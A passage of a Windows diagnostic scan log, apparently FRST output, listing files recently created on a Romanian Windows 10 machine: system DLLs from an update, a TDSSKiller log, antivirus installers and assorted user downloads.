2016-10-13 09:25 - 2016-10-05 12:20 - 00661504 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcWebFilter.dll
2016-10-13 09:25 - 2016-10-05 12:20 - 00303104 _____ (Microsoft Corporation) C:\WINDOWS\system32\nlasvc.dll
2016-10-13 09:25 - 2016-10-05 12:18 - 04612608 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.dll
2016-10-13 09:25 - 2016-10-05 12:18 - 00858112 _____ (Microsoft Corporation) C:\WINDOWS\system32\EmailApis.dll
2016-10-13 09:25 - 2016-10-05 12:17 - 00089088 _____ (Microsoft Corporation) C:\WINDOWS\system32\adsmsext.dll
2016-10-13 09:25 - 2016-10-05 12:16 - 19418624 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2016-10-13 09:25 - 2016-10-05 12:16 - 00704512 _____ (Microsoft Corporation) C:\WINDOWS\system32\cscui.dll
2016-10-13 09:25 - 2016-10-05 12:16 - 00508416 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
2016-10-13 09:25 - 2016-10-05 12:15 - 01375232 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll
2016-10-13 09:25 - 2016-10-05 12:15 - 00141312 _____ (Microsoft Corporation) C:\WINDOWS\system32\dialclient.dll
2016-10-13 09:25 - 2016-10-05 12:14 - 19416576 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2016-10-13 09:25 - 2016-10-05 12:14 - 01456640 _____ (Microsoft Corporation) C:\WINDOWS\system32\GdiPlus.dll
2016-10-13 09:25 - 2016-10-05 12:14 - 01255936 _____ (Microsoft Corporation) C:\WINDOWS\system32\AzureSettingSyncProvider.dll
2016-10-13 09:25 - 2016-10-05 12:13 - 12345856 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmp.dll
2016-10-13 09:25 - 2016-10-05 12:13 - 00055808 _____ (Microsoft Corporation) C:\WINDOWS\system32\offreg.dll
2016-10-13 09:25 - 2016-10-05 12:11 - 12174848 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2016-10-13 09:25 - 2016-10-05 12:11 - 06108672 _____ (Microsoft Corporation) C:\WINDOWS\system32\mos.dll
2016-10-13 09:25 - 2016-10-05 12:11 - 06043136 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2016-10-13 09:25 - 2016-10-05 12:11 - 03776000 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll
2016-10-13 09:25 - 2016-10-05 12:11 - 01938944 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2016-10-13 09:25 - 2016-10-05 12:11 - 01135616 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpncore.dll
2016-10-13 09:25 - 2016-10-05 12:11 - 00503296 _____ (Microsoft Corporation) C:\WINDOWS\system32\FrameServer.dll
2016-10-13 09:25 - 2016-10-05 12:11 - 00125440 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxdav.sys
2016-10-13 09:25 - 2016-10-05 12:10 - 06474752 _____ (Microsoft Corporation) C:\WINDOWS\system32\mspaint.exe
2016-10-13 09:25 - 2016-10-05 12:09 - 07467520 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstscax.dll
2016-10-13 09:25 - 2016-10-05 12:09 - 03369984 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepository.dll
2016-10-13 09:25 - 2016-10-05 12:09 - 01700864 _____ (Microsoft Corporation) C:\WINDOWS\system32\smartscreen.exe
2016-10-13 09:25 - 2016-10-05 12:09 - 00884224 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcomm.dll
2016-10-13 09:25 - 2016-10-05 12:09 - 00710144 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppointmentApis.dll
2016-10-13 09:25 - 2016-10-05 12:09 - 00691712 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll
2016-10-13 09:25 - 2016-10-05 12:09 - 00674304 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.dll
2016-10-13 09:25 - 2016-10-05 12:09 - 00608256 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32spl.dll
2016-10-13 09:25 - 2016-10-05 12:08 - 02356736 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVidCtl.dll
2016-10-13 09:25 - 2016-10-05 12:08 - 01485312 _____ (Microsoft Corporation) C:\WINDOWS\system32\diagtrack.dll
2016-10-13 09:25 - 2016-10-05 12:08 - 00873472 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadtb.dll
2016-10-13 09:25 - 2016-10-05 12:08 - 00598528 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Web.dll
2016-10-13 09:25 - 2016-10-05 12:07 - 03667456 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2016-10-13 09:25 - 2016-10-05 12:07 - 02682880 _____ (Microsoft Corporation) C:\WINDOWS\system32\netshell.dll
2016-10-13 09:25 - 2016-10-05 12:07 - 02646016 _____ (Microsoft Corporation) C:\WINDOWS\system32\CertEnroll.dll
2016-10-13 09:25 - 2016-10-05 12:07 - 01232384 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2016-10-13 09:25 - 2016-10-05 12:07 - 01123328 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll
2016-10-13 09:25 - 2016-10-05 12:06 - 02999296 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2016-10-13 09:25 - 2016-10-05 12:06 - 02254336 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2016-10-13 09:25 - 2016-10-05 12:06 - 01880576 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Logon.dll
2016-10-13 09:25 - 2016-10-05 12:06 - 01594368 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2016-10-13 09:25 - 2016-10-05 12:06 - 01013248 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Web.Http.dll
2016-10-13 09:25 - 2016-10-05 12:06 - 00850944 _____ (Microsoft Corporation) C:\WINDOWS\system32\ContactApis.dll
2016-10-13 09:25 - 2016-10-05 12:06 - 00711680 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Search.dll
2016-10-13 09:25 - 2016-10-05 12:05 - 03105792 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstsc.exe
2016-10-13 09:25 - 2016-10-05 12:05 - 00751104 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.BackgroundTransfer.dll
2016-10-13 09:25 - 2016-09-23 06:59 - 00446124 _____ C:\WINDOWS\system32\ApnDatabase.xml
2016-10-13 09:25 - 2016-09-07 08:18 - 00290264 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettingsAdminFlows.exe
2016-10-13 08:59 - 2016-10-13 09:13 - 00264046 _____ C:\TDSSKiller.3.1.0.11_13.10.2016_08.59.35_log.txt
2016-10-13 08:58 - 2016-10-13 08:59 - 04747704 _____ (AO Kaspersky Lab) C:\Users\admin\Downloads\tdsskiller.exe
2016-10-12 08:52 - 2016-10-12 08:52 - 00128035 _____ C:\Users\admin\Downloads\w_makb09.pdf
2016-10-12 08:51 - 2016-10-12 08:52 - 06964582 _____ C:\Users\admin\Downloads\w_ubun08.pdf
2016-10-11 13:52 - 2016-10-11 13:52 - 00000110 _____ C:\Users\admin\Downloads\live.m3u
2016-10-10 16:01 - 2016-10-10 16:01 - 00301075 _____ C:\Users\admin\Downloads\6124_FP_20161010142802_notificare-saptamanala-program-rascumparare--4----7-octombri.pdf
2016-10-10 14:45 - 2016-10-10 14:45 - 00001024 _____ C:\Users\Public\Desktop\AnyBurn.lnk
2016-10-10 14:45 - 2016-10-10 14:45 - 00000000 ____D C:\Users\admin\AppData\Roaming\anyburn
2016-10-10 14:45 - 2016-10-10 14:45 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AnyBurn
2016-10-10 14:45 - 2016-10-10 14:45 - 00000000 ____D C:\Program Files\AnyBurn
2016-10-10 14:44 - 2016-10-10 14:45 - 01386432 _____ (Power Software Ltd) C:\Users\admin\Downloads\anyburn_setup.exe
2016-10-10 14:40 - 2016-10-10 14:40 - 04764169 _____ C:\Users\admin\Downloads\ir053_portable.zip
2016-10-10 13:54 - 2016-10-10 13:54 - 03838492 _____ (LIGHTNING UK!) C:\Users\admin\Downloads\SetupImgBurn_2.5.8.0.exe
2016-10-10 12:47 - 2016-10-10 12:48 - 00202240 _____ C:\Users\admin\Downloads\VizualizareExtras(2).xls
2016-10-10 12:47 - 2016-10-10 12:47 - 00178688 _____ C:\Users\admin\Downloads\VizualizareExtras(1).xls
2016-10-10 12:47 - 2016-10-10 12:47 - 00178688 _____ C:\Users\admin\Downloads\VizualizareExtras(1)(1).xls
2016-10-10 09:47 - 2016-10-10 09:47 - 00121504 _____ (ESET) C:\WINDOWS\system32\Drivers\ekbdflt.sys
2016-10-07 15:12 - 2016-10-07 15:12 - 00037880 _____ C:\Users\admin\Downloads\vS_PivotsD.mq4
2016-10-07 14:41 - 2016-10-07 14:41 - 00000000 ____D C:\Users\admin\Downloads\1466_en-PIVOT POINT SUPPORT RESISTANCE
2016-10-07 13:14 - 2016-10-07 13:14 - 03213568 _____ (AVG Technologies CZ, s.r.o.) C:\Users\admin\Downloads\AVG_Protection_Free_1647.exe
2016-10-07 12:41 - 2016-10-07 12:42 - 231192896 _____ (AVAST Software) C:\Users\admin\Downloads\avast_free_antivirus_setup_offline.exe
2016-10-07 11:59 - 2016-10-07 11:59 - 00000000 ____D C:\Users\admin\Downloads\orar 2016-2017
2016-10-07 10:45 - 2016-10-07 10:45 - 00184105 _____ C:\Users\admin\Downloads\6124_FP_20161006112407_raport-curent-struct-actionariat-30-septembrie-2016_6-oct-20.pdf
2016-10-07 09:47 - 2016-10-07 09:47 - 00000000 ____D C:\Users\admin\Downloads\PicoInstaller10.2.0
2016-10-07 09:44 - 2016-10-07 09:45 - 03300037 _____ C:\Users\admin\Downloads\PicoInstaller10.2.0.rar
2016-10-06 12:49 - 2016-10-06 12:49 - 00258203 _____ C:\Users\admin\Downloads\download.pdf
2016-10-06 12:47 - 2016-10-06 12:47 - 00196462 _____ C:\Users\admin\Downloads\6124_FP_20161005214944_Publicare-prospect_clean.pdf
2016-10-06 10:16 - 2016-10-06 10:16 - 05524272 _____ (Microsoft Corporation) C:\Users\admin\Downloads\setuplanguagepack.x64.ro-ro_(office2016).exe
2016-10-06 09:14 - 2016-10-06 09:42 - 3950503936 _____ C:\Users\admin\Downloads\Win10_Romanian_x64.iso
2016-10-04 10:34 - 2016-10-04 10:37 - 00035840 _____ C:\Users\admin\Downloads\CHELTUIELI VENITURI SEPT MAMA.xls
2016-10-04 10:32 - 2016-10-04 10:32 - 00036352 _____ C:\Users\admin\Downloads\CHELTUIELI VENITURI AUGUST MAMA (1).xls
2016-10-04 01:28 - 2016-10-03 15:26 - 00000000 ___DC C:\WINDOWS\Panther
2016-10-04 01:22 - 2016-10-07 09:47 - 00000000 ____D C:\Windows.old
2016-10-04 01:17 - 2016-10-04 01:17 - 09260032 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmploc.DLL
2016-10-04 01:17 - 2016-10-04 01:17 - 06534656 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwanmm.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 03595264 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpcorets.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 03520512 _____ (Microsoft Corporation) C:\WINDOWS\system32\xpsrchvw.exe
2016-10-04 01:17 - 2016-10-04 01:17 - 03305984 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFMediaEngine.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 02755584 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.tlb
2016-10-04 01:17 - 2016-10-04 01:17 - 02206496 _____ (Microsoft Corporation) C:\WINDOWS\system32\msmpeg2vdec.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 02026496 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl
2016-10-04 01:17 - 2016-10-04 01:17 - 01997824 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlansvc.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 01966288 _____ (Microsoft Corporation) C:\WINDOWS\system32\hevcdecoder.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 01957216 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ntfs.sys
2016-10-04 01:17 - 2016-10-04 01:17 - 01853232 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmp4srcsnk.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 01842688 _____ (Microsoft Corporation) C:\WINDOWS\system32\pnidui.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 01656320 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Perception.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 01583112 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 01509376 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieapfltr.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 01362504 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmpmde.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 01343928 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsrcsnk.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 01300480 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVPXENC.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 01293312 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMPDMC.exe
2016-10-04 01:17 - 2016-10-04 01:17 - 01220608 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Audio.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 01201872 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmpeg2srcsnk.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 01123368 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfplat.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 01077760 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Editing.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 01013248 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwansvc.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00955528 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsvr.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00868704 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecConfig.efi
2016-10-04 01:17 - 2016-10-04 01:17 - 00856872 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfreadwrite.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00846336 _____ (Microsoft Corporation) C:\WINDOWS\system32\WebcamUi.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00834560 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.Vpn.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00798504 _____ (Microsoft Corporation) C:\WINDOWS\system32\rpcrt4.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00786432 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00762368 _____ (Microsoft Corporation) C:\WINDOWS\system32\mprddm.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00758784 _____ (Microsoft Corporation) C:\WINDOWS\system32\fvewiz.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00713216 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpnapps.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00671744 _____ (Microsoft Corporation) C:\WINDOWS\system32\pwcreator.exe
2016-10-04 01:17 - 2016-10-04 01:17 - 00635904 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9diag.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00585728 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapi.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00575488 _____ (Microsoft Corporation) C:\WINDOWS\system32\qdvd.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00575488 _____ (Microsoft Corporation) C:\WINDOWS\system32\nshwfp.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00557920 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\fvevol.sys
2016-10-04 01:17 - 2016-10-04 01:17 - 00518144 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\WdiWiFi.sys
2016-10-04 01:17 - 2016-10-04 01:17 - 00484584 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioSes.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00455168 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetworkCollectionAgent.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00455040 _____ (Microsoft Corporation) C:\WINDOWS\system32\DolbyDecMFT.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00444416 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSync.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00433832 _____ (Microsoft Corporation) C:\WINDOWS\system32\WWanAPI.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00431104 _____ (Microsoft Corporation) C:\WINDOWS\system32\mprdim.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00402352 _____ (Microsoft Corporation) C:\WINDOWS\system32\ws2_32.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00395264 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlansec.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00392704 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwanconn.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00366592 _____ (Microsoft Corporation) C:\WINDOWS\system32\das.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00357376 _____ (Microsoft Corporation) C:\WINDOWS\system32\Geolocation.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00349696 _____ (Microsoft Corporation) C:\WINDOWS\system32\bdechangepin.exe
2016-10-04 01:17 - 2016-10-04 01:17 - 00348160 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Midi.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00342528 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv.sys
2016-10-04 01:17 - 2016-10-04 01:17 - 00341344 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\Classpnp.sys
2016-10-04 01:17 - 2016-10-04 01:17 - 00340480 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00338432 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlanmsm.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00313560 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlanapi.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00310272 _____ (Microsoft Corporation) C:\WINDOWS\system32\bdesvc.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00306176 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieproxy.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00302592 _____ (Microsoft Corporation) C:\WINDOWS\system32\fvecpl.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00300544 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00292184 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\FWPKCLNT.SYS
2016-10-04 01:17 - 2016-10-04 01:17 - 00279416 _____ (Microsoft Corporation) C:\WINDOWS\system32\bdeunlock.exe
2016-10-04 01:17 - 2016-10-04 01:17 - 00272896 _____ (Microsoft Corporation) C:\WINDOWS\system32\PsmServiceExtHost.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00270848 _____ (Microsoft Corporation) C:\WINDOWS\system32\wifiprofilessettinghandler.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00257024 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveui.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00248832 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlancfg.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00248832 _____ (Microsoft Corporation) C:\WINDOWS\system32\dlnashext.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00237056 _____ (Microsoft Corporation) C:\WINDOWS\system32\SyncSettings.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00231424 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudBackupSettings.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00230400 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb10.sys
2016-10-04 01:17 - 2016-10-04 01:17 - 00209920 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSAC3ENC.DLL
2016-10-04 01:17 - 2016-10-04 01:17 - 00198656 _____ (Microsoft Corporation) C:\WINDOWS\system32\indexeddbserver.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00198144 _____ (Microsoft Corporation) C:\WINDOWS\system32\FSClient.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00188416 _____ (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe
2016-10-04 01:17 - 2016-10-04 01:17 - 00187904 _____ (Microsoft Corporation) C:\WINDOWS\system32\manage-bde.exe
2016-10-04 01:17 - 2016-10-04 01:17 - 00187392 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfksproxy.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00185344 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapibase.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00167936 _____ (Microsoft Corporation) C:\WINDOWS\system32\fvenotify.exe
2016-10-04 01:17 - 2016-10-04 01:17 - 00158208 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveprompt.exe
2016-10-04 01:17 - 2016-10-04 01:17 - 00153088 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettings.DeviceEncryptionHandlers.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00133296 _____ (Microsoft Corporation) C:\WINDOWS\system32\sspicli.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00121368 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfps.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00121344 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakrathunk.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00110080 _____ (Microsoft Corporation) C:\WINDOWS\system32\baaupdate.exe
2016-10-04 01:17 - 2016-10-04 01:17 - 00106336 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\partmgr.sys
2016-10-04 01:17 - 2016-10-04 01:17 - 00103424 _____ (Microsoft Corporation) C:\WINDOWS\system32\BitLockerDeviceEncryption.exe
2016-10-04 01:17 - 2016-10-04 01:17 - 00102752 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ksecdd.sys
2016-10-04 01:17 - 2016-10-04 01:17 - 00092000 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pdc.sys
2016-10-04 01:17 - 2016-10-04 01:17 - 00085504 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpninprc.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00083120 _____ (Microsoft Corporation) C:\WINDOWS\system32\devenum.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00081408 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmled.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00080224 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpudd.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00070656 _____ (Microsoft Corporation) C:\WINDOWS\system32\dasHost.exe
2016-10-04 01:17 - 2016-10-04 01:17 - 00068096 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwanprotdim.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00061440 _____ (Microsoft Corporation) C:\WINDOWS\system32\iesetup.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00051200 _____ (Microsoft Corporation) C:\WINDOWS\system32\csrsrv.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00043944 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsass.exe
2016-10-04 01:17 - 2016-10-04 01:17 - 00038912 _____ (Microsoft Corporation) C:\WINDOWS\system32\wfdprov.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00035328 _____ (Microsoft Corporation) C:\WINDOWS\system32\deviceassociation.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\system32\iernonce.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00028160 _____ (Microsoft Corporation) C:\WINDOWS\system32\bdeui.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00023552 _____ (Microsoft Corporation) C:\WINDOWS\system32\WiFiConfigSP.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00023040 _____ (Microsoft Corporation) C:\WINDOWS\system32\cmintegrator.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00022528 _____ (Microsoft Corporation) C:\WINDOWS\system32\encapi.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00020480 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlansvcpal.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00015360 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlanhlp.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00012288 _____ (Microsoft Corporation) C:\WINDOWS\system32\cngkeyhelper.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00009216 _____ (Microsoft Corporation) C:\WINDOWS\system32\spwmp.dll
2016-10-04 01:17 - 2016-10-04 01:17 - 00005120 _____ (Microsoft Corporation) C:\WINDOWS\system32\msdxm.ocx
2016-10-04 01:17 - 2016-10-04 01:17 - 00005120 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxmasf.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 20965248 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 07625728 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 06654616 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 05398016 _____ (Microsoft Corporation) C:\WINDOWS\system32\aclui.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 05376000 _____ (Microsoft Corporation) C:\WINDOWS\system32\BingMaps.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 04970224 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppsvc.exe
2016-10-04 01:16 - 2016-10-04 01:16 - 04557824 _____ (Microsoft) C:\WINDOWS\system32\dbgeng.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 04311736 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe
2016-10-04 01:16 - 2016-10-04 01:16 - 03733504 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_47.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 03716096 _____ (Microsoft Corporation) C:\WINDOWS\system32\bootux.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 02749440 _____ (Microsoft Corporation) C:\WINDOWS\system32\mispace.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 02642944 _____ (Microsoft Corporation) C:\WINDOWS\system32\tquery.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 02360832 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapRouter.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 02333184 _____ (Microsoft Corporation) C:\WINDOWS\system32\WsmSvc.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 02318336 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettingsThresholdAdminFlowUI.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 02153984 _____ (Microsoft Corporation) C:\WINDOWS\system32\storagewmi.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 02138112 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputService.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 02107392 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapGeocoder.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 02048496 _____ C:\WINDOWS\system32\CoreUIComponents.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 01988096 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssrch.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 01897824 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2016-10-04 01:16 - 2016-10-04 01:16 - 01885696 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 01774080 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetworkMobileSettings.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 01755136 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceFlows.DataModel.dll
